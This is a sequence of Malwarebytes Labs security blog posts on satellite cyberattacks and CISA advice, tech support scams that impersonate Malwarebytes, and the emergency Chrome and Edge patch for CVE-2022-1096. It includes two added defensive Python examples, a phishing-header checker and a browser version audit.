Along with that alert came a report that provided mitigation strategies for SATCOM providers and their customers. And, as part of CISA’s Shields Up initiative, all organizations are being asked to significantly lower their threshold for reporting and sharing indications of malicious cyberactivity.

Russia

On March 2, 2022 the current head of the Russian Roscosmos State Space Corporation, Dmitry Rogozin, said that Russia will consider any cyberattacks targeting Russian satellite infrastructure an act of war. This didn’t seem to stop activist group NB65 from claiming that it had disabled WS02, the Roscosmos Vehicle Monitoring System.

Viasat

On February 28, 2022 US-listed satellite communications firm Viasat Inc said it was investigating a suspected cyberattack that caused a partial outage in its residential broadband services in Ukraine and other European countries. Among other things, the outage disrupted the remote monitoring and control of 5,800 wind turbines in Central Europe, with a total capacity of 11 gigawatts (GW).

Starlink

Viasat operates large geostationary satellites. Geostationary means their orbital period matches the earth’s rotation, so they appear stationary to an observer on the ground; that orbit sits about 35,800 kilometers above the equator.

Viasat’s geostationary approach is the traditional method of providing broadband service from space, but other operators, like Starlink, use satellites in low earth orbit. This requires many more satellites, but the shorter signal path gives lower latency and higher throughput.

In answer to a request for Starlink support from Ukraine digital minister Mykhailo Fedorov, SpaceX’s CEO Elon Musk was quick to respond and promise help.

Critical infrastructure

The examples above demonstrate how networks of satellites and space systems are vulnerable to cyberattack, and create a backdoor into the physical and digital systems we rely upon on a daily basis.

While we tend to think about other things first when we are discussing critical infrastructure, the underlying systems that enable technology functionality across these sectors often rely on space systems. For example, some high-tech farming equipment relies on GPS information provided by satellite.

Like so many other important assets, a lot of space systems were developed without cybersecurity in mind. Around the turn of the century, cybersecurity was not a big concern, and during the development of some systems no special cybersecurity parameters were deployed because engineers thought the technology was too advanced for a hacker to compromise.

It wasn’t until NASA set up the Cyber Defense Engineering and Research Group (CDER) that anyone looked at the unique cybersecurity requirements that distinguish space mission systems from traditional firewalled data servers.

And it wasn’t until the end of 2016, that AT&T encrypted NASA’s Deep Space Network (DSN), after a report on how to hack into the Mars Rover appeared on the Internet.

Recommendations

If you know or suspect that an important part of your organization’s internal processes depends on satellite services, the CISA report provides some guidelines for customers of SATCOM providers:

  • Use secure methods for authentication.
  • Enforce principle of least privilege through authorization policies.
  • Review existing trust relationships with IT service providers.
  • Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider.
  • Strengthen the security of operating systems, software, and firmware, including vulnerability and patch management.
  • Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Create, maintain, and exercise a cyberincident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.

Stay safe, everyone!

The post Satellites are critical infrastructure and need to be cybersecured appeared first on Malwarebytes Labs.

A week in security (March 21 – 27)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (March 21 – 27) appeared first on Malwarebytes Labs.

Tech support fraud is still very much alive, says latest FBI report

The FBI’s Internet Crime Complaint Center (IC3) has released its annual report. In 2021, IC3 continued to receive a record number of complaints from the American public: 847,376 reported complaints, which was a 7% increase from 2020, with potential losses exceeding $6.9 billion. Among the complaints received, ransomware, business email compromise (BEC) schemes, and the criminal use of cryptocurrency are among the top incidents reported.

The IC3 also received 23,903 complaints related to tech support fraud from victims in 70 countries. The losses amounted to more than $347 million, which represents a 137 percent increase in losses from 2020.

Tech support fraud

Tech support fraud is a type of scam that is often neglected in the press, but as a security software vendor we are regularly reminded that this branch of scamming is still active. The only surprise in the report is that the sector is still showing strong growth.

Tech support fraud is where a criminal poses as customer, security, or technical support in order to defraud unwitting individuals. Criminals involved in tech support fraud will claim to be support or service employees from trusted institutions like banks and software vendors. Often, they sell victims services they don’t need or at absurd prices, and many victims report being directed to make wire transfers to overseas accounts or purchase large amounts of prepaid cards.

Malwarebytes examples

We get a lot of questions and complaints about tech support scammers impersonating us or using our brand to defraud victims. We set up a dedicated page for tech support scams years ago. Sometimes the scam mails are easy to recognize, and the offers these scammers make are often heavily over-priced. In the example shown below, the scammer couldn’t decide whether to use MW Bytes or MA Bytes, but they added our logo at the bottom to make a good impression.

fake Malwarebytes email

This is an email template we see quite often, although the phone number varies from one campaign to the next.

different phone number

To help you avoid Malwarebytes impersonators, there are a few important red flags you can look out for:

  • Overpricing. You can find our actual pricing here: https://www.malwarebytes.com/pricing
  • Malwarebytes does not use a third party company for technical support on our products. Support is in-house at Malwarebytes.
  • Our employees have company email addresses, so we will not use gmail, comcast, or other third party email addresses in our customer facing communications.

Senders that claim to be responsible for Malwarebytes Tech Support which we see repeatedly are TechGeek, Geek Squad Team, Czone Solutions Inc, Tech philosopher, Web-Gear solutions, and Malwarebytes Support R Us. While some of these may be the names of actual legitimate companies, none of them have any business acting on Malwarebytes’ behalf.
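The red flags above translate directly into a mail-filter check. The following is an added example (written for this page, not a Malwarebytes filter) that parses a From header, flags free-mail sender domains, flags a message that claims the Malwarebytes brand in its display name or subject while not coming from the vendor's own domain, and matches the sender names the post lists. The legitimate-domain allowlist (malwarebytes.com), the free-mail list and the sample headers are assumptions constructed for the example; the normalization deliberately squashes spaces and punctuation so “MW Bytes” and “MA Bytes” are caught as brand claims.

```python
import re
from email.utils import parseaddr

BRAND = "malwarebytes"
# Assumption for the example: the vendor's own sending domain.
LEGIT_DOMAINS = {"malwarebytes.com"}
# Third-party mailbox providers the post says the vendor never uses for customer mail.
FREEMAIL = {"gmail.com", "comcast.net", "yahoo.com", "outlook.com", "hotmail.com"}
# Sender names the post says repeatedly claim to be Malwarebytes Tech Support.
KNOWN_IMPERSONATORS = {"TechGeek", "Geek Squad Team", "Czone Solutions Inc",
                       "Tech philosopher", "Web-Gear solutions",
                       "Malwarebytes Support R Us"}


def _squash(text):
    """Lower-case and drop everything but letters: 'MW Bytes' -> 'mwbytes'."""
    return re.sub(r"[^a-z]", "", text.lower())


def claims_brand(display_name, subject):
    """True if the display name or subject invokes the brand or a mangled form of it."""
    text = _squash(display_name + " " + subject)
    return BRAND in text or re.search(r"(mw|ma|malware)bytes", text) is not None


def assess(from_header, subject):
    """Return the list of red flags raised by a From header and subject line."""
    name, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    flags = []
    if domain in FREEMAIL:
        flags.append("freemail-sender")
    if claims_brand(name, subject) and domain not in LEGIT_DOMAINS:
        flags.append("brand-claim-from-foreign-domain")
    if _squash(name) in {_squash(k) for k in KNOWN_IMPERSONATORS}:
        flags.append("known-impersonator-name")
    return flags


# Constructed sample headers, modelled on the templates described in the post.
SAMPLES = [
    ('"MW Bytes Support" <mwbytes.renewal@gmail.com>',
     "Your Malwarebytes subscription has been renewed"),
    ('"Geek Squad Team" <billing@example.invalid>', "Invoice attached"),
    ('Malwarebytes Support <support@malwarebytes.com>', "Your support ticket"),
]

if __name__ == "__main__":
    for hdr, subj in SAMPLES:
        print(hdr, "->", assess(hdr, subj) or "clean")
```

Treat the flags as a triage signal, not a verdict: a legitimate reseller could trip the brand-claim rule, and a scammer who registers a lookalike domain will not trip the free-mail rule, which is why the post's advice to contact the vendor through a channel you found yourself still applies.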

How to avoid tech support scams

In general, keep an eye out for overpricing. And do your own research to check the company in question’s charges.

When in doubt, do not use links or phone numbers sent by email. Research a direct method of contacting the organization by yourself and use that line of contact to enquire whether they are the origin of the mail.

For matters regarding Malwarebytes, please reach out to our Support team.

Stay safe, everyone!

The post Tech support fraud is still very much alive, says latest FBI report appeared first on Malwarebytes Labs.

Update now! Google releases emergency patch for Chrome zero-day used in the wild

Google has urged its 3 billion+ users to update to Chrome version 99.0.4844.84 for Mac, Windows, and Linux to mitigate a zero-day that is currently being exploited in the wild. This is in response to a bug reported by an anonymous security researcher last week.

The flaw, which is tracked as CVE-2022-1096, is a “Type Confusion in V8” and is rated as high severity, meaning that everyone using Chrome should update as quickly as possible because of the damage attackers could cause by exploiting it.

Not much is known about the vulnerability itself or how great the impact would be if exploited, but the unusual release of this patch, which notably addresses just one vulnerability, means that this update shouldn’t be ignored.

Google is always cautious to release more details until the majority of users are updated with a fix. Google says it may take weeks before the update reaches its entire user base.

How to update

The easiest way to update is to allow Chrome to do it automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time.

My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is relaunch the browser.

Microsoft Edge

Microsoft has confirmed that Edge, a Chromium-based browser, is also affected by this vulnerability. Edge users should urgently update their browsers to version 99.0.1150.55, which is not vulnerable to the flaw.
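For anyone checking a fleet rather than a single desktop, here is an added example (written for this page, not Google's or Microsoft's tooling) that compares reported browser versions against the two fixed versions named above. The inventory lines are constructed for the example and how you collect real versions is outside its scope. The point it makes is that version strings must be compared numerically, component by component: a plain string comparison ranks “100.0.4896.60” below “99.0.4844.84” and would report a patched Chrome 100 as vulnerable.

```python
# Fixed versions named in the post: Chrome 99.0.4844.84 and Edge 99.0.1150.55.
FIXED_VERSIONS = {
    "chrome": "99.0.4844.84",
    "edge": "99.0.1150.55",
}


def parse_version(version):
    """Turn '99.0.4844.84' into (99, 0, 4844, 84); reject non-numeric components."""
    parts = []
    for component in version.strip().split("."):
        if not component.isdigit():
            raise ValueError(f"non-numeric version component in {version!r}")
        parts.append(int(component))
    return tuple(parts)


def is_patched(browser, version):
    """True if the given browser version is at or above the fixed version."""
    have = parse_version(version)
    need = parse_version(FIXED_VERSIONS[browser.lower()])
    # Pad the shorter tuple with zeros so '100.0' compares as 100.0.0.0.
    width = max(len(have), len(need))
    have += (0,) * (width - len(have))
    need += (0,) * (width - len(need))
    return have >= need


def unpatched_hosts(inventory):
    """Return hostnames whose browser is still below the fixed version."""
    return [host for host, browser, version in inventory
            if not is_patched(browser, version)]


# Constructed inventory: (hostname, browser, reported version).
INVENTORY = [
    ("ws-01", "chrome", "99.0.4844.74"),
    ("ws-02", "chrome", "99.0.4844.84"),
    ("ws-03", "chrome", "100.0.4896.60"),
    ("ws-04", "edge", "99.0.1150.46"),
    ("ws-05", "edge", "99.0.1150.55"),
]

if __name__ == "__main__":
    print("needs update:", unpatched_hosts(INVENTORY))
```

Because Chrome only finishes an update on relaunch, a host can report the new version on disk while still running the old binary; the check above is necessary but not sufficient until the browser has actually been restarted, which is the point the post makes about never closing the browser.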

The post Update now! Google releases emergency patch for Chrome zero-day used in the wild appeared first on Malwarebytes Labs.